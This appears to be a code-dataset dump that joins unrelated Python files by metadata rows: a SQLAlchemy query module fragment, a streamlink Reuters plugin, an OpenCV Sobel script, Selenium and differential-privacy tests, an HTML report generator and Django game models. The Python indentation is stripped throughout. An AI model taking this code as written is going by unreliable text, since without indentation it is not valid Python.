allowing post-processing as well as custom return types, without
involving ORM identity-mapped classes.
.. versionadded:: 0.9.0
.. seealso::
:ref:`bundles`
"""
single_entity = False
"""If True, queries for a single Bundle will be returned as a single
entity, rather than an element within a keyed tuple."""
is_clause_element = False
is_mapper = False
is_aliased_class = False
def __init__(self, name, *exprs, **kw):
r"""Construct a new :class:`.Bundle`.
e.g.::
bn = Bundle("mybundle", MyClass.x, MyClass.y)
for row in session.query(bn).filter(
bn.c.x == 5).filter(bn.c.y == 4):
print(row.mybundle.x, row.mybundle.y)
:param name: name of the bundle.
:param \*exprs: columns or SQL expressions comprising the bundle.
:param single_entity=False: if True, rows for this :class:`.Bundle`
can be returned as a "single entity" outside of any enclosing tuple
in the same manner as a mapped entity.
"""
self.name = self._label = name
self.exprs = exprs
self.c = self.columns = ColumnCollection()
self.columns.update((getattr(col, "key", col._label), col)
for col in exprs)
self.single_entity = kw.pop('single_entity', self.single_entity)
columns = None
"""A namespace of SQL expressions referred to by this :class:`.Bundle`.
e.g.::
bn = Bundle("mybundle", MyClass.x, MyClass.y)
q = sess.query(bn).filter(bn.c.x == 5)
Nesting of bundles is also supported::
b1 = Bundle("b1",
Bundle('b2', MyClass.a, MyClass.b),
Bundle('b3', MyClass.x, MyClass.y)
)
q = sess.query(b1).filter(
b1.c.b2.c.a == 5).filter(b1.c.b3.c.y == 9)
.. seealso::
:attr:`.Bundle.c`
"""
c = None
"""An alias for :attr:`.Bundle.columns`."""
def _clone(self):
cloned = self.__class__.__new__(self.__class__)
cloned.__dict__.update(self.__dict__)
return cloned
def __clause_element__(self):
return expression.ClauseList(group=False, *self.exprs)
@property
def clauses(self):
return self.__clause_element__().clauses
def label(self, name):
"""Provide a copy of this :class:`.Bundle` passing a new label."""
cloned = self._clone()
cloned.name = name
return cloned
def create_row_processor(self, query, procs, labels):
"""Produce the "row processing" function for this :class:`.Bundle`.
May be overridden by subclasses.
.. seealso::
:ref:`bundles` - includes an example of subclassing.
"""
keyed_tuple = util.lightweight_named_tuple('result', labels)
def proc(row):
return keyed_tuple([proc(row) for proc in procs])
return proc
class _BundleEntity(_QueryEntity):
use_id_for_hash = False
def __init__(self, query, bundle, setup_entities=True):
query._entities.append(self)
self.bundle = self.expr = bundle
self.type = type(bundle)
self._label_name = bundle.name
self._entities = []
if setup_entities:
for expr in bundle.exprs:
if isinstance(expr, Bundle):
_BundleEntity(self, expr)
else:
_ColumnEntity(self, expr, namespace=self)
self.supports_single_entity = self.bundle.single_entity
@property
def mapper(self):
return self.entity_zero.mapper
@property
def entities(self):
entities = []
for ent in self._entities:
entities.extend(ent.entities)
return entities
@property
def entity_zero(self):
for ent in self._entities:
ezero = ent.entity_zero
if ezero is not None:
return ezero
else:
return None
def corresponds_to(self, entity):
# TODO: this seems to have no effect for
# _ColumnEntity either
return False
@property
def entity_zero_or_selectable(self):
for ent in self._entities:
ezero = ent.entity_zero_or_selectable
if ezero is not None:
return ezero
else:
return None
def adapt_to_selectable(self, query, sel):
c = _BundleEntity(query, self.bundle, setup_entities=False)
# c._label_name = self._label_name
# c.entity_zero = self.entity_zero
# c.entities = self.entities
for ent in self._entities:
ent.adapt_to_selectable(c, sel)
def setup_entity(self, ext_info, aliased_adapter):
for ent in self._entities:
ent.setup_entity(ext_info, aliased_adapter)
def setup_context(self, query, context):
for ent in self._entities:
ent.setup_context(query, context)
def row_processor(self, query, context, result):
procs, labels = zip(
*[ent.row_processor(query, context, result)
for ent in self._entities]
)
proc = self.bundle.create_row_processor(query, procs, labels)
return proc, self._label_name
class _ColumnEntity(_QueryEntity):
"""Column/expression based entity."""
def __init__(self, query, column, namespace=None):
self.expr = column
self.namespace = namespace
search_entities = True
check_column = False
if isinstance(column, util.string_types):
column = sql.literal_column(column)
self._label_name = column.name
search_entities = False
check_column = True
_entity = None
elif isinstance(column, (
attributes.QueryableAttribute,
interfaces.PropComparator
)):
_entity = getattr(column, '_parententity', None)
if _entity is not None:
search_entities = False
self._label_name = column.key
column = column._query_clause_element()
check_column = True
if isinstance(column, Bundle):
_BundleEntity(query, column)
return
if not isinstance(column, sql.ColumnElement):
if hasattr(column, '_select_iterable'):
# break out an object like Table into
# individual columns
for c in column._select_iterable:
if c is column:
break
_ColumnEntity(query, c, namespace=column)
else:
return
raise sa_exc.InvalidRequestError(
"SQL expression, column, or mapped entity "
"expected - got '%r'" % (column, )
)
elif not check_column:
self._label_name = getattr(column, 'key', None)
search_entities = True
self.type = type_ = column.type
self.use_id_for_hash = not type_.hashable
# If the Column is unnamed, give it a
# label() so that mutable column expressions
# can be located in the result even
# if the expression's identity has been changed
# due to adaption.
if not column._label and not getattr(column, 'is_literal', False):
column = column.label(self._label_name)
query._entities.append(self)
self.column = column
self.froms = set()
# look for ORM entities represented within the
# given expression. Try to count only entities
# for columns whose FROM object is in the actual list
# of FROMs for the overall expression - this helps
# subqueries which were built from ORM constructs from
# leaking out their entities into the main select construct
self.actual_froms = actual_froms = set(column._from_objects)
if not search_entities:
self.entity_zero = _entity
if _entity:
self.entities = [_entity]
self.mapper = _entity.mapper
else:
self.entities = []
self.mapper = None
self._from_entities = set(self.entities)
else:
all_elements = [
elem for elem in sql_util.surface_column_elements(
column, include_scalar_selects=False)
if 'parententity' in elem._annotations
]
self.entities = util.unique_list([
elem._annotations['parententity']
for elem in all_elements
if 'parententity' in elem._annotations
])
self._from_entities = set([
elem._annotations['parententity']
for elem in all_elements
if 'parententity' in elem._annotations
and actual_froms.intersection(elem._from_objects)
])
if self.entities:
self.entity_zero = self.entities[0]
self.mapper = self.entity_zero.mapper
elif self.namespace is not None:
self.entity_zero = self.namespace
self.mapper = None
else:
self.entity_zero = None
self.mapper = None
supports_single_entity = False
@property
def entity_zero_or_selectable(self):
if self.entity_zero is not None:
return self.entity_zero
elif self.actual_froms:
return list(self.actual_froms)[0]
else:
return None
def adapt_to_selectable(self, query, sel):
c = _ColumnEntity(query, sel.corresponding_column(self.column))
c._label_name = self._label_name
c.entity_zero = self.entity_zero
c.entities = self.entities
def setup_entity(self, ext_info, aliased_adapter):
if 'selectable' not in self.__dict__:
self.selectable = ext_info.selectable
if self.actual_froms.intersection(ext_info.selectable._from_objects):
self.froms.add(ext_info.selectable)
def corresponds_to(self, entity):
# TODO: just returning False here,
# no tests fail
if self.entity_zero is None:
return False
elif _is_aliased_class(entity):
# TODO: polymorphic subclasses ?
return entity is self.entity_zero
else:
return not _is_aliased_class(self.entity_zero) and \
entity.common_parent(self.entity_zero)
def row_processor(self, query, context, result):
if ('fetch_column', self) in context.attributes:
column = context.attributes[('fetch_column', self)]
else:
column = query._adapt_clause(self.column, False, True)
if context.adapter:
column = context.adapter.columns[column]
getter = result._getter(column)
return getter, self._label_name
def setup_context(self, query, context):
column = query._adapt_clause(self.column, False, True)
context.froms += tuple(self.froms)
context.primary_columns.append(column)
context.attributes[('fetch_column', self)] = column
def __str__(self):
return str(self.column)
class QueryContext(object):
__slots__ = (
'multi_row_eager_loaders', 'adapter', 'froms', 'for_update',
'query', 'session', 'autoflush', 'populate_existing',
'invoke_all_eagers', 'version_check', 'refresh_state',
'primary_columns', 'secondary_columns', 'eager_order_by',
'eager_joins', 'create_eager_joins', 'propagate_options',
'attributes', 'statement', 'from_clause', 'whereclause',
'order_by', 'labels', '_for_update_arg', 'runid', 'partials',
'post_load_paths', 'identity_token'
)
def __init__(self, query):
if query._statement is not None:
if isinstance(query._statement, expression.SelectBase) and \
not query._statement._textual and \
not query._statement.use_labels:
self.statement = query._statement.apply_labels()
else:
self.statement = query._statement
else:
self.statement = None
self.from_clause = query._from_obj
self.whereclause = query._criterion
self.order_by = query._order_by
self.multi_row_eager_loaders = False
self.adapter = None
self.froms = ()
self.for_update = None
self.query = query
self.session = query.session
self.autoflush = query._autoflush
self.populate_existing = query._populate_existing
self.invoke_all_eagers = query._invoke_all_eagers
self.version_check = query._version_check
self.refresh_state = query._refresh_state
self.primary_columns = []
self.secondary_columns = []
self.eager_order_by = []
self.eager_joins = {}
self.create_eager_joins = []
self.propagate_options = set(o for o in query._with_options if
o.propagate_to_loaders)
self.attributes = query._attributes.copy()
if self.refresh_state is not None:
self.identity_token = query._refresh_identity_token
else:
self.identity_token = None
class AliasOption(interfaces.MapperOption):
def __init__(self, alias):
r"""Return a :class:`.MapperOption` that will indicate to the :class:`.Query`
that the main table has been aliased.
This is a seldom-used option to suit the
very rare case that :func:`.contains_eager`
is being used in conjunction with a user-defined SELECT
statement that aliases the parent table. E.g.::
# define an aliased UNION called 'ulist'
ulist = users.select(users.c.user_id==7).\
union(users.select(users.c.user_id>7)).\
alias('ulist')
# add on an eager load of "addresses"
statement = ulist.outerjoin(addresses).\
select().apply_labels()
# create query, indicating "ulist" will be an
# alias for the main table, "addresses"
# property should be eager loaded
query = session.query(User).options(
contains_alias(ulist),
contains_eager(User.addresses))
# then get results via the statement
results = query.from_statement(statement).all()
:param alias: is the string name of an alias, or a
:class:`~.sql.expression.Alias` object representing
the alias.
"""
self.alias = alias
def process_query(self, query):
if isinstance(self.alias, util.string_types):
alias = query._mapper_zero().mapped_table.alias(self.alias)
else:
alias = self.alias
query._from_obj_alias = sql_util.ColumnAdapter(alias)
| 37.200552 | 102 | 0.596236 |
6553d2f7a1f6788c9eab7c70882c8f6861f46714 | 463 | py | Python | hktm/lesson_contents/RenderContent_K362.py | karlneco/kanji-test-maker | de0ae52d8de28fe81be2ec49018acf1ad0f2308e | [
"MIT"
] | 2 | 2019-12-11T07:09:57.000Z | 2020-02-02T23:34:51.000Z | hktm/lesson_contents/RenderContent_K362.py | karlneco/kanji-test-maker | de0ae52d8de28fe81be2ec49018acf1ad0f2308e | [
"MIT"
] | 1 | 2021-10-04T05:59:17.000Z | 2021-10-04T05:59:17.000Z | hktm/lesson_contents/RenderContent_K362.py | karlneco/kanji-test-maker | de0ae52d8de28fe81be2ec49018acf1ad0f2308e | [
"MIT"
] | null | null | null | from hktm.lesson_contents.RenderContent_KT36 import RenderContentKT36
from yattag import Doc
class RenderContentK362(RenderContentKT36):
"""
This is the class for rendering kanji tests.
"""
#################################################################### constructor
def __init__(self,question_bundle):
super().__init__(question_bundle)
self.render_mode = {
'pdf':'90px',
'preview':'80'
}
| 28.9375 | 80 | 0.557235 |
c1f5c366b3d15429d43775f7a7fb25d748f46729 | 3,219 | py | Python | src/streamlink/plugins/reuters.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/reuters.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/reuters.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | import logging
import re
from streamlink.plugin import Plugin, PluginError, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(
r'https?://([\w-]+\.)*reuters\.(com|tv)'
))
class Reuters(Plugin):
_re_fusion_global_content = re.compile(r"Fusion\s*\.\s*globalContent\s*=\s*(?P<json>{.+?})\s*;\s*Fusion\s*\.", re.DOTALL)
_re_fusion_content_cache = re.compile(r"Fusion\s*\.\s*contentCache\s*=\s*(?P<json>{.+?})\s*;\s*Fusion\s*\.", re.DOTALL)
def _get_data(self):
root = self.session.http.get(self.url, schema=validate.Schema(
validate.parse_html()
))
try:
log.debug("Trying to find source via meta tag")
schema = validate.Schema(
validate.xml_xpath_string(".//meta[@property='og:video'][1]/@content"),
validate.url()
)
return schema.validate(root)
except PluginError:
pass
try:
log.debug("Trying to find source via next-head")
schema = validate.Schema(
validate.xml_findtext(".//script[@type='application/ld+json'][@class='next-head']"),
validate.parse_json(),
{"contentUrl": validate.url()},
validate.get("contentUrl")
)
return schema.validate(root)
except PluginError:
pass
schema_fusion = validate.xml_findtext(".//script[@type='application/javascript'][@id='fusion-metadata']")
schema_video = validate.all(
{"source": {"hls": validate.url()}},
validate.get(("source", "hls"))
)
try:
log.debug("Trying to find source via fusion-metadata globalContent")
schema = validate.Schema(
schema_fusion,
validate.transform(self._re_fusion_global_content.search),
validate.get("json"),
validate.parse_json(),
{"result": {"related_content": {"videos": list}}},
validate.get(("result", "related_content", "videos", 0)),
schema_video
)
return schema.validate(root)
except PluginError:
pass
try:
log.debug("Trying to find source via fusion-metadata contentCache")
schema = validate.Schema(
schema_fusion,
validate.transform(self._re_fusion_content_cache.search),
validate.get("json"),
validate.parse_json(),
{"videohub-by-guid-v1": {str: {"data": {"result": {"videos": list}}}}},
validate.get("videohub-by-guid-v1"),
validate.transform(lambda obj: obj[list(obj.keys())[0]]),
validate.get(("data", "result", "videos", 0)),
schema_video
)
return schema.validate(root)
except PluginError:
pass
def _get_streams(self):
hls_url = self._get_data()
if hls_url:
return HLSStream.parse_variant_playlist(self.session, hls_url)
__plugin__ = Reuters
| 36.168539 | 125 | 0.559491 |
b049d472c87039837e1eb8b9095d20454f87c7a4 | 314 | py | Python | Chapter07/codes/sobel.py | atpost/Computer-Vision-with-Python-3 | cb4c0c5d88b6cd291b5fff5c4a91f605d8b0f3c0 | [
"MIT"
] | 60 | 2017-09-12T16:38:00.000Z | 2022-03-28T15:24:37.000Z | Chapter07/codes/sobel.py | atpost/Computer-Vision-with-Python-3 | cb4c0c5d88b6cd291b5fff5c4a91f605d8b0f3c0 | [
"MIT"
] | 1 | 2020-03-02T16:10:56.000Z | 2020-07-30T05:12:10.000Z | Chapter07/codes/sobel.py | atpost/Computer-Vision-with-Python-3 | cb4c0c5d88b6cd291b5fff5c4a91f605d8b0f3c0 | [
"MIT"
] | 62 | 2017-09-06T09:18:42.000Z | 2022-03-24T14:34:45.000Z | import cv2
img = cv2.imread("image.jpg")
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
x_edges = cv2.Sobel(gray,-1,1,0,ksize=5)
cv2.imwrite("sobel_edges_x.jpg", x_edges)
y_edges = cv2.Sobel(gray,-1,0,1,ksize=5)
cv2.imwrite("sobel_edges_y.jpg", y_edges)
cv2.imshow("xedges", x_edges)
cv2.imshow("yedges", y_edges)
| 31.4 | 44 | 0.732484 |
5294c83c40c73c02bbbd8b0d1c95386d3dc05924 | 3,452 | py | Python | main/courses/videos/tests/test_views_selenium.py | csev/class2go | f9419ae16448d20fc882170f95cfd1c4dc3331ca | [
"Apache-2.0"
] | 2 | 2015-10-31T23:12:52.000Z | 2021-01-19T11:03:00.000Z | main/courses/videos/tests/test_views_selenium.py | sunu/class2go | 653b1edd01d390ad387dd788e0fc2d89445fbcab | [
"Apache-2.0"
] | null | null | null | main/courses/videos/tests/test_views_selenium.py | sunu/class2go | 653b1edd01d390ad387dd788e0fc2d89445fbcab | [
"Apache-2.0"
] | null | null | null | from django.core.urlresolvers import reverse
from lxml import etree
from nose.plugins.attrib import attr
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from test_harness.test_base_selenium import InstructorBase, StudentBase
def DEBUG(s):
"""A useful method for adding tracing to help figure out why tests go bad
Particularly helpful for working with remote test services that capture
output, like travis-ci."""
import sys
sys.stderr.write(s)
class InstructorVideoTest(InstructorBase):
@attr('selenium')
@attr(user='instructor')
def test_course_video_problem_set(self):
"""[sel] Test an instructor can load and display a video problemset"""
# log in to the site before loading a page
self.do_login()
browser = self.browser
# load the problem set for video 4
list_url = reverse('course_video_pset',
kwargs={'course_prefix' : self.course_prefix,
'course_suffix' : self.course_suffix,
'video_id' : 4 })
browser.get('%s%s' % (self.live_server_url, list_url))
WebDriverWait(browser, 15).until(lambda browser : browser.find_element_by_xpath('//body'))
# make sure we have an exercise div
self.assertTrue(browser.find_element_by_xpath('//div[contains(@class, "exercise")]'))
# pull the data-name attributes from exercise divs
tree = etree.HTML(browser.page_source)
result = tree.xpath('//div[contains(@class, "exercise")]/@data-name')
# check that we got the right number of exercises - TODO: use the ORM to get the count
self.assertEqual(len(result), 1, msg="Unexpected number of divs with data.")
# check that we got the right exercise - TODO: use the ORM to get the name
self.assertEqual('xx_P1_Regexp', result[0])
class StudentVideoTest(StudentBase):
@attr('selenium')
@attr(user='student')
def test_course_video(self):
"""[sel] Tests that a student can display an individual video"""
self.do_login()
browser = self.browser
# get the list of videos
list_url = reverse('course_video_list',
kwargs={'course_prefix' : self.course_prefix,
'course_suffix' : self.course_suffix })
browser.get('%s%s' % (self.live_server_url, list_url))
WebDriverWait(browser, 15).until(lambda browser : browser.find_element_by_xpath('//body'))
# pull the urls of each video from the in-page list
tree = etree.HTML(browser.page_source)
# pull the href from the anchor contained in the course-list-content
urls = tree.xpath('//div[@class="course-list-content"]//a/@href')
self.assertEqual(len(urls), 3, msg="Wrong number of live videos.")
url = urls[1] # An essentially random, yet reproducible, choice
browser.get('%s%s' % (self.live_server_url, url))
# When loaded we should have an iframe that contains the youtube content
WebDriverWait(browser, 15).until(lambda browser : browser.find_element_by_tag_name('iframe'))
# switch to the iframe for the youtube player and find the embeded player
browser.switch_to_frame(browser.find_element_by_tag_name('iframe'))
self.assertTrue(browser.find_element_by_xpath('//embed[@id="video-player"]'))
| 45.421053 | 101 | 0.659328 |
48d1830c47042a8cc7473d35bdff72f78ecba625 | 1,709 | py | Python | tests/tools/test_mean.py | Jakondak/differential-privacy-library | c26bab301f2554b52c8bd836b28091f2f2611cd4 | [
"MIT"
] | 1 | 2020-05-03T06:06:44.000Z | 2020-05-03T06:06:44.000Z | tests/tools/test_mean.py | dohmatob/differential-privacy-library | 1a17bf0e3bf7d18d5c19258abbf81c27fd9a5e16 | [
"MIT"
] | null | null | null | tests/tools/test_mean.py | dohmatob/differential-privacy-library | 1a17bf0e3bf7d18d5c19258abbf81c27fd9a5e16 | [
"MIT"
] | 1 | 2022-01-02T11:29:30.000Z | 2022-01-02T11:29:30.000Z | from unittest import TestCase
import numpy as np
from diffprivlib.tools.utils import mean
from diffprivlib.utils import PrivacyLeakWarning
class TestMean(TestCase):
def test_not_none(self):
mech = mean
self.assertIsNotNone(mech)
def test_no_params(self):
a = np.array([1, 2, 3])
with self.assertWarns(PrivacyLeakWarning):
res = mean(a)
self.assertIsNotNone(res)
def test_no_epsilon(self):
a = np.array([1, 2, 3])
self.assertIsNotNone(mean(a, range=1))
def test_no_range(self):
a = np.array([1, 2, 3])
with self.assertWarns(PrivacyLeakWarning):
res = mean(a, epsilon=1)
self.assertIsNotNone(res)
def test_negative_range(self):
a = np.array([1, 2, 3])
with self.assertRaises(ValueError):
mean(a, epsilon=1, range=-1)
def test_missing_range(self):
a = np.array([1, 2, 3])
with self.assertWarns(PrivacyLeakWarning):
res = mean(a, epsilon=1, range=None)
self.assertIsNotNone(res)
def test_large_epsilon(self):
a = np.random.random(1000)
res = float(np.mean(a))
res_dp = mean(a, epsilon=1, range=1)
self.assertAlmostEqual(res, res_dp, delta=0.01)
def test_large_epsilon_axis(self):
a = np.random.random((1000, 5))
res = np.mean(a, axis=0)
res_dp = mean(a, epsilon=1, range=1, axis=0)
for i in range(res.shape[0]):
self.assertAlmostEqual(res[i], res_dp[i], delta=0.01)
def test_nan(self):
a = np.random.random((5, 5))
a[2, 2] = np.nan
res = mean(a, range=1)
self.assertTrue(np.isnan(res))
| 27.564516 | 65 | 0.597425 |
3abefd360896c2c57f6387256de13e37952a314e | 9,229 | py | Python | decision reasoning/profiling report/temp_list/div.py | kidrabit/Data-Visualization-Lab-RND | baa19ee4e9f3422a052794e50791495632290b36 | [
"Apache-2.0"
] | 1 | 2022-01-18T01:53:34.000Z | 2022-01-18T01:53:34.000Z | decision reasoning/profiling report/temp_list/div.py | kidrabit/Data-Visualization-Lab-RND | baa19ee4e9f3422a052794e50791495632290b36 | [
"Apache-2.0"
] | null | null | null | decision reasoning/profiling report/temp_list/div.py | kidrabit/Data-Visualization-Lab-RND | baa19ee4e9f3422a052794e50791495632290b36 | [
"Apache-2.0"
] | null | null | null | def input_query_div(cnt_create, attributes, tasks, visType):
div = '''
<div id="vis''' + str(cnt_create) + '''" style="display: flex; height: 250px; margin-bottom: 5px; border: 3px solid #74788D;">
<div id="list">
<table>
<tr>
<th>attributes</th>
<td>''' + attributes + '''</td>
</tr>
<tr>
<th>tasks</th>
<td>''' + tasks + '''</td>
</tr>
<tr>
<th>visType</th>
<td>''' + visType + '''</td>
</tr>
</table>
</div>
<div id="vlSpec"></div>
</div>
'''
return div
def current_div(cnt_create, name, children_node, action, output, output_percent, output_sign):
div = '''
<div id="vis''' + str(cnt_create) + '''" style="display: flex; height: 250px; margin-bottom: 5px; border: 3px solid #74788D;">
<div id="node" style="width: 30px; height: 30px; margin: 5px; text-align: center; border: 2px solid black; border-radius: 50%; line-height: 30px;">''' + name + '''</div>
<div id="bar1" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
<div id="bar2" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
<div id="recommend" style="width: 40%;">
<div id="recommend1" style="display: flex; width: 100%; height: 20%;">
<div id="recommend_node1" style="width: 30px; height: 30px; margin: 5px; color: white; background-color: #47597E; text-align: center; border: 2px solid black; border-radius: 50%; line-height: 30px;">''' + children_node[0].name + '''</div>
<div id="recommend_list1" style="width: 100%; height: 100%; margin: 5px; background-color: #DBE6FD; text-align: left; border: 2px solid; border-radius: 5px;">
''' + action[0] + '''
<div id="issue" style="display: flex;">
결측 값 개수
<div id="issue1" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue1_inner" style="width: ''' + str(output_percent[0][0]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #f37021 0%, #FFCDD2 100%);">''' + str(output[0][0]) + '''</div>
</div>
'''+ output_sign[0][0] + ''', 극단 값 개수
<div id="issue2" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue2_inner" style="width: ''' + str(output_percent[0][1]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #4CAF50 0%, #C8E6C9 100%);">''' + str(output[0][1]) + '''</div>
</div>
'''+ output_sign[0][1] + ''', 통합 개수
<div id="issue3" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue3_inner" style="width: ''' + str(output_percent[0][2]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #2196F3 0%, #BBDEFB 100%);">''' + str(output[0][2]) + '''</div>
</div>
'''+ output_sign[0][2] + '''
</div>
</div>
</div>
<br>
<div id="recommend2" style="display: flex; width: 100%; height: 20%;">
<div id="recommend_node2" style="width: 30px; height: 30px; margin: 5px; background-color: lightgray; text-align: center; border: 2px solid; border-radius: 50%; line-height: 30px;">''' + children_node[1].name + '''</div>
<div id="recommend_list2" style="width: 100%; height: 100%; margin: 5px; background-color: lightgray; text-align: left; border: 2px solid; border-radius: 5px;">
''' + action[1] + '''
<div id="issue" style="display: flex;">
결측 값 개수
<div id="issue1" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue1_inner" style="width: ''' + str(output_percent[1][0]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #f37021 0%, #FFCDD2 100%);">''' + str(output[1][0]) + '''</div>
</div>
'''+ output_sign[1][0] + ''', 극단 값 개수
<div id="issue2" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue2_inner" style="width: ''' + str(output_percent[1][1]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #4CAF50 0%, #C8E6C9 100%);">''' + str(output[1][1]) + '''</div>
</div>
'''+ output_sign[1][1] + ''', 통합 개수
<div id="issue3" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue3_inner" style="width: ''' + str(output_percent[1][2]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #2196F3 0%, #BBDEFB 100%);">''' + str(output[1][2]) + '''</div>
</div>
'''+ output_sign[1][2] + '''
</div>
</div>
</div>
<br>
<div id="recommend3" style="display: flex; width: 100%; height: 20%;">
<div id="recommend_node3" style="width: 30px; height: 30px; margin: 5px; background-color: lightgray; text-align: center; border: 2px solid; border-radius: 50%; line-height: 30px;">''' + children_node[2].name + '''</div>
<div id="recommend_list3" style="width: 100%; height: 100%; margin: 5px; background-color: lightgray; text-align: left; border: 2px solid; border-radius: 5px;">
''' + action[2] + '''
<div id="issue" style="display: flex;">
결측 값 개수
<div id="issue1" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue1_inner" style="width: ''' + str(output_percent[2][0]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #f37021 0%, #FFCDD2 100%);">''' + str(output[2][0]) + '''</div>
</div>
'''+ output_sign[2][0] + ''', 극단 값 개수
<div id="issue2" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue2_inner" style="width: ''' + str(output_percent[2][1]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #4CAF50 0%, #C8E6C9 100%);">''' + str(output[2][1]) + '''</div>
</div>
'''+ output_sign[2][1] + ''', 통합 개수
<div id="issue3" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
<div id="issue3_inner" style="width: ''' + str(output_percent[2][2]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #2196F3 0%, #BBDEFB 100%);">''' + str(output[2][2]) + '''</div>
</div>
'''+ output_sign[2][2] + '''
</div>
</div>
</div>
</div>
</div>
'''
return div
def recommend_div(cnt_create, name):
div = '''
<div id="vis''' + str(cnt_create) + '''" style="display: flex; height: 250px; margin-bottom: 5px; border: 3px solid #74788D;">
<div id="node" style="width: 30px; height: 30px; margin: 5px; text-align: center; border: 2px solid black; border-radius: 50%; line-height: 30px;">''' + name + '''</div>
<div id="heatmap_before" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
<div id="heatmap_after" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
<div id="histogram_before" style="width: 20%; border-right: 3px solid #F2F2F5;"></div>
<div id="histogram_after" style="width: 20%;"></div>
</div>
'''
return div | 82.401786 | 285 | 0.477842 |
0a20476ac032f075e17884970df9ef15cdca109c | 4,491 | py | Python | models.py | sharan-amutharasu/game-doble | f8f8e9c29b50b89e170d4f8019f9244b4f1f197f | [
"MIT"
] | null | null | null | models.py | sharan-amutharasu/game-doble | f8f8e9c29b50b89e170d4f8019f9244b4f1f197f | [
"MIT"
] | null | null | null | models.py | sharan-amutharasu/game-doble | f8f8e9c29b50b89e170d4f8019f9244b4f1f197f | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
#add_to_end: 2017-08-24 08:42:19.063507
from django.urls import reverse #Used to generate URLs by reversing the URL patterns
import uuid # Required for unique book instances
from django.contrib.auth.models import User
from datetime import datetime
#add_to_end: 2017-08-24 08:45:15.134057
#model:mt_game
class mt_game(models.Model):
#mt_ball.fields
f_game_name = models.CharField(primary_key=False, max_length=100, default="dgame")
f_game_size = models.IntegerField(default = 2)
f_game_password = models.CharField(max_length = 20, default="password")
f_player1 = models.CharField(max_length=100)
f_player2 = models.CharField(max_length=100)
f_player3 = models.CharField(max_length=100)
f_p1_start_time = models.DateTimeField(default = datetime.now)
f_p2_start_time = models.DateTimeField(default = datetime.now)
f_p3_start_time = models.DateTimeField(default = datetime.now)
f_p1_play_time = models.IntegerField(default = 0)
f_p2_play_time = models.IntegerField(default = 0)
f_p3_play_time = models.IntegerField(default = 0)
f_p1_waiting = models.IntegerField(default = 0)
f_p2_waiting = models.IntegerField(default = 0)
f_p3_waiting = models.IntegerField(default = 0)
f_p1_started = models.IntegerField(default = 0)
f_p2_started = models.IntegerField(default = 0)
f_p3_started = models.IntegerField(default = 0)
f_p1_stopped = models.IntegerField(default = 0)
f_p2_stopped = models.IntegerField(default = 0)
f_p3_stopped = models.IntegerField(default = 0)
f_p1_cards_played = models.IntegerField(default = 0)
f_p2_cards_played = models.IntegerField(default = 0)
f_p3_cards_played = models.IntegerField(default = 0)
f_key = models.CharField(max_length=100, default="none")
f_set1 = models.CharField(max_length=100, default="none")
f_set2 = models.CharField(max_length=100, default="none")
f_set3 = models.CharField(max_length=100, default="none")
f_play = models.CharField(max_length=100, default="none")
f_winner = models.CharField(max_length=100, default="none")
#mt_ball.meta
class Meta:
ordering = ['f_game_name']
#mt_ball.methods
def get_absolute_url(self):
return reverse('game2', args=[str(self.id)])
def __str__(self):
return self.f_game_name
#add_to_end: 2017-08-24 08:45:15.134090
#model:mt_deck
class mt_deck(models.Model):
#mt_deck.fields
f_card_no = models.IntegerField(primary_key=True)
f_e1 = models.CharField(max_length=100)
f_e2 = models.CharField(max_length=100)
f_e3 = models.CharField(max_length=100)
f_e4 = models.CharField(max_length=100)
f_e5 = models.CharField(max_length=100)
f_e6 = models.CharField(max_length=100)
f_e7 = models.CharField(max_length=100)
f_e8 = models.CharField(max_length=100)
f_e1_size = models.IntegerField()
f_e2_size = models.IntegerField()
f_e3_size = models.IntegerField()
f_e4_size = models.IntegerField()
f_e5_size = models.IntegerField()
f_e6_size = models.IntegerField()
f_e7_size = models.IntegerField()
f_e8_size = models.IntegerField()
#mt_ball.meta
class Meta:
ordering = ['f_card_no']
#mt_ball.methods
def get_absolute_url(self):
return reverse('mt_deck', args=[str(self.f_card_no)])
def __str__(self):
return str(self.f_card_no)
def list_elements(self):
return [self.f_e1, self.f_e2, self.f_e3, self.f_e4, self.f_e5, self.f_e6, self.f_e7, self.f_e8]
#model:mt_iq
class mt_iq(models.Model):
#mt_ball.fields
